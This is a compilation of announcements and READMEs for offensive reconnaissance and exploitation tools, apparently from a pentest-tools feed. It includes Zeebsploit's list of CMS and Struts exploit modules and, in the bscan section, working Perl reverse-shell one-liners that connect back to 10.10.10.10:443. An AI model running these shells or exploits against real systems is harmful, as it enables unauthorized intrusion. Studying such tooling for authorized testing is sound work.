Zeebsploit – Web Scanner / Exploitation / Information Gathering

zeebsploit is a tool for hacking, searching for web information and scanning a web site for vulnerabilities.

Installation & Usage

apt-get install git
git clone https://github.com/jaxBCD/Zeebsploit.git
cd Zeebsploit
chmod +x install
./install
python3 zeebsploit.py

Type 'help' to show the modules and follow the instructions.

Modules

[Main modules]

+----------+-------------------------------+
| Modules  | Description                   |
+----------+-------------------------------+
| Exploit  | Exploitation Modules          |
| Scanners | Scanners Modules              |
| infoga   | information Gathering Modules |
+----------+-------------------------------+

[Exploit Modules]

+---------------------------+--------------------------------------------------+
| Modules                   | Description                                      |
+---------------------------+--------------------------------------------------+
| wp content injection      | wordpress content injection version 4.7 or 4.7.1 |
| wp revslider              | wordpress plugin revslider remote file upload    |
| wp learndash              | wordpress learndash remote file upload           |
| wp swhobiz                | wordpress plugin showbiz remote file upload      |
| joomla com fabrik         | joomla component fabrik file upload              |
| joomla manager get config | joomla component manager auto get config         |
| joomla jdownload          | joomla component jdownloads remote file upload   |
| joomla                    | Joomla ads manager component auto shell upload   |
| apache struts rce         | CVE: 2017-5638 – Apache Struts2 S2-045           |
|                           | remote command execution                         |
| drupal8 rce               | drupal version 8 remote command execution        |
| dvr cam leak credential   | TBK DVR4104 / DVR4216                            |
|                           | – Credentials Leak (Get User and password)       |
| webdav file upload        | Nothing                                          |
| ---More---                | Coming Soon the following version                |
+---------------------------+--------------------------------------------------+

[Scanner Module]

+--------------------+----------------------------------------+
| Modules            | Description                            |
+--------------------+----------------------------------------+
| subdomain scanner  | Scan Subdomain for Web                 |
| sqli scanner       | Scan Sql Injection Vulnerability       |
| xss scanner        | Scan XSS Injection Vulnerability       |
| lfi scanner        | Local File Includes Scanner etc/passwd |
| admin login finder | Scan Admin Login page                  |
| directory scanner  | scan directory on web use dirhunt      |
| subdomain takeover | scan type subdomain takeover           |
| ---More---         | Coming Soon the following version      |
+--------------------+----------------------------------------+

[Information Gathering]

+--------------------+------------------------------------------+
| Modules            | Description                              |
+--------------------+------------------------------------------+
| cms detector       | a tool for detecting cms on a web        |
| port scanner       | Scan Open Port use Nmap                  |
| information header | response header information              |
| ip geolocation     | detect the location of an ip or host     |
| email searcher     | searching email from web                 |
| traceroute         | to show the route the package has passed |
| robot.txt detector | Scan Robot.txt from Web                  |
| header information | Response Header Checker                  |
| whois lookup       | looking for registered users or          |
|                    | recipients of Internet resource rights   |
| ---More---         | Coming Soon the following version        |
+--------------------+------------------------------------------+

Link: http://feedproxy.google.com/~r/PentestTools/~3/9xaMRbIv1Dk/zeebsploit-web-scanner-exploitation.html

Osmedeus – Fully Automated Offensive Security Tool For Reconnaissance And Vulnerability Scanning

Osmedeus allows you to automatically run a collection of awesome tools for reconnaissance and vulnerability scanning against the target.

How to use

If you have no idea what you are doing, just type the command below or check out the Advanced Usage.

./osmedeus.py -t example.com

Installation

git clone https://github.com/j3ssie/Osmedeus
cd Osmedeus
./install.sh

This install only focuses on Kali Linux; check the Wiki page for more install options.

Features

- Subdomain Scan.
- Subdomain TakeOver Scan.
- Screenshot the target.
- Basic recon like Whois, Dig info.
- IP Discovery.
- CORS Scan.
- SSL Scan.
- Headers Scan.
- Port Scan.
- Vulnerable Scan.
- Separate workspaces to store all scan output and detailed logging.
- REST API.
- SPA Web UI.
- Slack notifications.

Contact: @j3ssiejjj

Link: http://feedproxy.google.com/~r/PentestTools/~3/DCeXRDXo4J0/osmedeus-fully-automated-offensive.html

Chomp Scan – A Scripted Pipeline Of Tools To Streamline The Bug Bounty/Penetration Test Reconnaissance Phase

A scripted pipeline of tools to simplify the bug bounty/penetration test reconnaissance phase, so you can focus on chomping bugs.

Scope

Chomp Scan is a Bash script that chains together the fastest and most effective tools (in my opinion/experience) for doing the long and sometimes tedious process of recon. No more looking for word lists and trying to remember when you started a scan and where the output is. Chomp Scan creates a timestamped output directory based on the search domain, e.g. example.com-21:38:15, and puts all tool output there, split into individual sub-directories as appropriate. Custom output directories are also supported via the -o flag.

New: Chomp Scan now integrates Notica, which allows you to receive a notification when the script finishes. Simply visit Notica and get a unique URL parameter. Pass the parameter to Chomp Scan via the -n flag, keep the Notica page open in a browser tab on your computer or phone, and you will receive a message when Chomp Scan has finished running. No more constantly checking/forgetting to check those long running scans.

Chomp Scan runs in multiple modes. The primary one is using command-line arguments to select which scanning phases to use, which wordlists, etc. A guided interactive mode is available, as well as a non-interactive mode, useful if you do not want to deal with setting multiple arguments.

A list of interesting words is included, such as dev, test, uat, staging, etc., and domains containing those terms are flagged. This way you can focus on the interesting domains first if you wish. This list can be customized to suit your own needs, or replaced with a different file via the -X flag.

A blacklist file is included, to exclude certain domains from the results. However, it does not prevent those domains from being resolved, only from being used for port scanning and content discovery. It can be passed via the -b flag.

Chomp Scan supports limited canceling/skipping of tools by pressing Ctrl-c. This can sometimes have unintended side effects, so use with care.

Note: Chomp Scan is in active development, and new/different tools will be added as I come across them. Pull requests and comments welcome!

Scanning Phases

Subdomain Discovery (3 different sized wordlists)
  - dnscan
  - subfinder
  - sublist3r
  - massdns + altdns

Screenshots (optional)
  - aquatone

Port Scanning (optional)
  - masscan and/or nmap
  - nmap output styled with nmap-bootstrap-xsl

Information Gathering (optional) (4 different sized wordlists)
  - subjack
  - bfac
  - whatweb
  - wafw00f
  - nikto

Content Discovery (optional) (4 different sized wordlists)
  - ffuf
  - gobuster
  - dirsearch

Wordlists

A variety of wordlists are used, both for subdomain bruteforcing and content discovery. Daniel Miessler's Seclists are used heavily, as well as Jason Haddix's lists. Different wordlists can be used by passing in a custom wordlist or using one of the built-in named argument lists below.

Subdomain Bruteforcing

  Argument Name  Filename                                          Word Count  Description
  short          subdomains-top1mil-20000.txt                      22k         From Seclists
  long           sortedcombined-knock-dnsrecon-fierce-reconng.txt  102k        From Seclists
  huge           huge-200k.txt                                     199k        Combination I made of various wordlists, including Seclists

Content Discovery

  Argument Name  Filename                           Word Count  Description
  small          big.txt                            20k         From Seclists
  medium         raft-large-combined.txt            167k        Combination of the raft wordlists in Seclists
  large          seclists-combined.txt              215k        Larger combination of all the Discovery/DNS lists in Seclists
  xl             haddix_content_discovery_all.txt   373k        Jason Haddix's all content discovery list
  xxl            haddix-seclists-combined.txt       486k        Combination of the two previous lists

Misc.

altdns-words.txt – 240 words – Used for creating domain permutations for masscan to resolve. Borrowed from altdns.

interesting.txt – 43 words – A list I created of potentially interesting words appearing in domain names. Provide your own interesting words list with the -X flag.

Installation

Clone this repo and run the installer.sh script. Make sure to source ~/.profile after running the installer in order to add the Go binary path to your $PATH variable. Then run Chomp Scan.

Usage

Chomp Scan always runs subdomain enumeration, thus a domain is required via the -u flag. The domain should not contain a scheme, e.g. http:// or https://. By default, HTTPS is always used. This can be changed to HTTP by passing the -H flag. A wordlist is optional, and if one is not provided the built-in short list (20k words) is used.

Other scan phases are optional. Content discovery can take an optional wordlist, otherwise it defaults to the built-in short (22k words) list.

The final results of the scan are stored in two text files in the output directory. All unique domains that are found are stored in all_discovered_domains.txt, and all unique IPs that are discovered are stored in all_discovered_ips.txt.

chomp-scan.sh -u example.com -a d short -cC large -p -o path/to/directory

Usage of Chomp Scan:

  -u domain      (required) Domain name to scan. This should not include a scheme, e.g. https:// or http://.
  -d wordlist    (optional) The wordlist to use for subdomain enumeration. Three built-in lists, short, long, and huge can be used, as well as the path to a custom wordlist. The default is short.
  -c             (optional) Enable content discovery phase. The wordlist for this option defaults to short if not provided.
  -C wordlist    (optional) The wordlist to use for content discovery. Five built-in lists, small, medium, large, xl, and xxl can be used, as well as the path to a custom wordlist. The default is small.
  -s             (optional) Enable screenshots using Aquatone.
  -i             (optional) Enable information gathering phase, using subjack, bfac, whatweb, wafw00f, and nikto.
  -p             (optional) Enable portscanning phase, using masscan (run as root) and nmap.
  -I             (optional) Enable interactive mode. This allows you to select certain tool options and inputs interactively. This cannot be run with -D.
  -D             (optional) Enable default non-interactive mode. This mode uses pre-selected defaults and requires no user interaction or options. This cannot be run with -I. Options: Subdomain enumeration wordlist: short. Content discovery wordlist: small. Aquatone screenshots: yes. Portscanning: yes. Information gathering: yes. Domains to scan: all unique discovered.
  -b wordlist    (optional) Set custom domain blacklist file.
  -X wordlist    (optional) Set custom interesting word list.
  -o directory   (optional) Set custom output directory. It must exist and be writable.
  -a             (optional) Use all unique discovered domains for scans, rather than interesting domains. This cannot be used with -A.
  -A             (optional, default) Use only interesting discovered domains for scans, rather than all discovered domains. This cannot be used with -a.
  -H             (optional) Use HTTP for connecting to sites instead of HTTPS.
  -h             (optional) Display this help page.

In The Future

Chomp Scan is still in active development, as I use it myself for bug hunting, so I intend to continue adding new features and tools as I come across them. New tool suggestions, feedback, and pull requests are all welcomed. Here is a short list of potential additions I'm considering:

- Adding a config file, for more granular customization of tools and parameters
- Adding testing/support for Ubuntu/Debian
- A possible Python re-write (and maybe a Go re-write after that!)
- The generation of an HTML report, similar to what aquatone provides

Link: http://www.kitploit.com/2019/03/chomp-scan-scripted-pipeline-of-tools.html

Bscan – An Asynchronous Target Enumeration Tool

Synopsis

bscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.

Installation

bscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.

Download the latest packaged version from PyPI:

pip install bscan

Or get the bleeding-edge version from version control:

pip install https://github.com/welchbj/bscan/archive/master.tar.gz

Basic Usage

bscan has a wide variety of configuration options which can be used to tune scans to your needs. Here's a quick example:

$ bscan \
>     --max-concurrency 3 \
>     --patterns [Mm]icrosoft \
>     --status-interval 10 \
>     --verbose-status \
>     scanme.nmap.org

What's going on here?

- --max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time
- --patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output
- --status-interval 10 tells bscan to print runtime status updates every 10 seconds
- --verbose-status means that each of these status updates will print details of all currently-running scan subprocesses
- scanme.nmap.org is the host upon which we want to enumerate

bscan also relies on some additional configuration files. The default files can be found in the bscan/configuration directory and serve the following purposes:

- patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan output
- required-programs.txt specifies the installed programs that bscan plans on using
- port-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan output
- service-scans.toml defines the scans to be run on the target(s) on a per-service basis

Detailed Options

Here's what you should see when running bscan --help:

usage: bscan [OPTIONS] targets

an asynchronous service enumeration tool

positional arguments:
  targets               the targets and/or networks on which to perform enumeration

optional arguments:
  -h, --help            show this help message and exit
  --brute-pass-list F   filename of password list to use for brute-forcing
  --brute-user-list F   filename of user list to use for brute-forcing
  --cmd-print-width I   the maximum integer number of characters allowed when printing the command used to spawn a running subprocess (defaults to 80)
  --config-dir D        the base directory from which to load the configuration files; required configuration files missing from this directory will instead be loaded from the default files shipped with this program
  --hard                force overwrite of existing directories
  --max-concurrency I   maximum integer number of subprocesses permitted to be running concurrently (defaults to 20)
  --no-program-check    disable checking the presence of required system programs
  --no-file-check       disable checking the presence of files such as configured wordlists
  --no-service-scans    disable running scans on discovered services
  --output-dir D        the base directory in which to write output files
  --patterns [ [ ...]]  regex patterns to highlight in output text
  --ping-sweep          enable ping sweep filtering of hosts from a network range before running more intensive scans
  --quick-only          whether to only run the quick scan (and not include the thorough scan over all ports)
  --qs-method S         the method for performing the initial TCP port scan; must correspond to a configured port scan
  --status-interval I   integer number of seconds to pause in between printing status updates; a non-positive value disables updates (defaults to 30)
  --ts-method S         the method for performing the thorough TCP port scan; must correspond to a configured port scan
  --udp                 whether to run UDP scans
  --udp-method S        the method for performing the UDP port scan; must correspond to a configured port scan
  --verbose-status      whether to print verbose runtime status updates, based on frequency specified by `--status-interval` flag
  --version             program version
  --web-word-list F     the wordlist to use for scans

Companion Tools

The main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.

bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here's a simple example:

$ bscan-wordlists --find "*win*"
/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
/usr/share/wordlists/metasploit/sensitive_files_win.txt
/usr/share/seclists/Passwords/common-passwords-win.txt

Try bscan-wordlists --help to explore other options.

bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here's a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:

$ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
perl for windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl with /bin/sh
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl without /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells --help to explore other options.

Development

Start by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):

# setup the environment
mkvirtualenv -p $(which python3) bscan-dev
workon bscan-dev

# get the deps
pip install -r dev-requirements.txt

Lint and type-check the project (these are run on Travis, too):

flake8 . && mypy bscan

When it's time to package a new release:

# build source and wheel distributions
python setup.py bdist_wheel sdist

# run post-build checks
twine check dist/*

# upload to PyPI
twine upload dist/*

Link: http://feedproxy.google.com/~r/PentestTools/~3/nmAEkhGVeYk/bscan-asynchronous-target-enumeration.html

WPintel – Chrome Extension Designed For WordPress Vulnerability Scanning And Information Gathering

WordPress Vulnerability Scanner – Scan for vulnerabilities, version, themes, plugins and much more!

WPintel allows you to scan self hosted WordPress sites. With WPintel you can detect the following:

- Version
- Version vulnerabilities
- Plugins
- Themes
- Users
- and much more!

Although WPintel is designed for self hosted (wordpress.org) WordPress sites, some of its functionalities still work for sites hosted on wordpress.com.

Link: http://www.kitploit.com/2019/01/wpintel-chrome-extension-designed-for.html

Stardox – Github Stargazers Information Gathering Tool

Stardox is an advanced GitHub stargazers information gathering tool. It scrapes GitHub for information and displays it in a list tree view. It can be used for collecting details about the stargazers of your own or someone else's repository.

What data it fetches:

- Total repositories
- Total stars
- Total Followers
- Total Following

P.S: Many new things will be added soon.

Gallery: fetching data of a repository; list tree view of fetched data.

Getting Started

Steps to setup:

git clone https://github.com/0xprateek/stardox
cd stardox
python ./setup.py install

Starting Stardox:

cd stardox/src
python3 stardox.py

Example Usage:

python3 ./stardox.py

Link: http://feedproxy.google.com/~r/PentestTools/~3/kAWqztoZ97E/stardox-github-stargazers-information.html

SiteBroker – A Cross-Platform Python Based Utility For Information Gathering And Penetration Testing Automation!

A cross-platform python based utility for information gathering and penetration automation!

Output: SiteBroker's full output (screenshot).

Requirements

- Python (2.7.*)
- Python pip
- Python module requests
- Python module colorama
- Python module dnspython
- Python module lxml
- Python module bs4

Install modules

pip install -r requirements.txt

Tested on

- Windows 7/8/8.1
- Kali linux (2017.2)

Download SiteBroker

You can download the latest version of SiteBroker by cloning the GitHub repository.

git clone https://github.com/Anon-Exploiter/SiteBroker

Updates

- Changed the whole script into Python (previously it was written in PHP)
- Exceptions covered for both user interrupts and internal issues!
- Removed the NetCraft module, as we would need to use Selenium and PhantomJS for it (ultimately making the script slow!)
- Fixed the problem of response code '200' for most sites in the Admin Panel Finder module and Shell Finder module

Change-log

- Added new features for Reverse IP (via HackerTarget and YouGetSignal)
- Added new features for crawling (via Google, Bing and manually, with my hands ;)
- Added a new method for subdomain scanning! (Takes some time though :p)

Usage

Initializing Script:

python SiteBroker.py

Advanced Usage:

Author: Syed Umar Arfeen (An0n 3xPloiTeR)
Usage: python SiteBroker.py

A cross-platform python based utility for information gathering and penetration automation!

Options:
  1). Cloudflare Bypass.
  2). Website Crawler.
        |____ Google Based Crawling
        |____ Bing Based Crawling
        |____ Manually Crawling
  3). Reverse IP.
        |____ YouGetSignal Based
        |____ HackerTarget's API Based
  4). Information Gathering.
        |____ Whois Lookup
        |____ BrowserSpy Report
  5). Nameservers.
  6). WebSite Speed.
  7). Subdomains Scanner
  8). Shell Finder.
  9). Admin Panel Finder.
  10). Grab Banner.
  11). All Things.

Example: python SiteBroker.py

Link: http://feedproxy.google.com/~r/PentestTools/~3/9uXfhpdgDLs/sitebroker-cross-platform-python-based.html

Infoga – Email OSINT

Infoga is a tool that gathers email account information (ip, hostname, country, ...) from different public sources (search engines, PGP key servers and Shodan) and checks whether emails were leaked using the haveibeenpwned.com API. It is a really simple tool, but very effective for the early stages of a penetration test or just to know the visibility of your company on the Internet.

Installation

$ git clone https://github.com/m4ll0k/Infoga.git infoga
$ cd infoga
$ python setup.py install
$ python infoga.py

Usage

$ python infoga.py --domain nsa.gov --source all --breach -v 2 --report ../nsa_gov.txt
$ python infoga.py --info m4ll0k@protonmail.com --breach -v 3 --report ../m4ll0k.txt

Link: http://feedproxy.google.com/~r/PentestTools/~3/qcMnDjIfkHQ/infoga-email-osint.html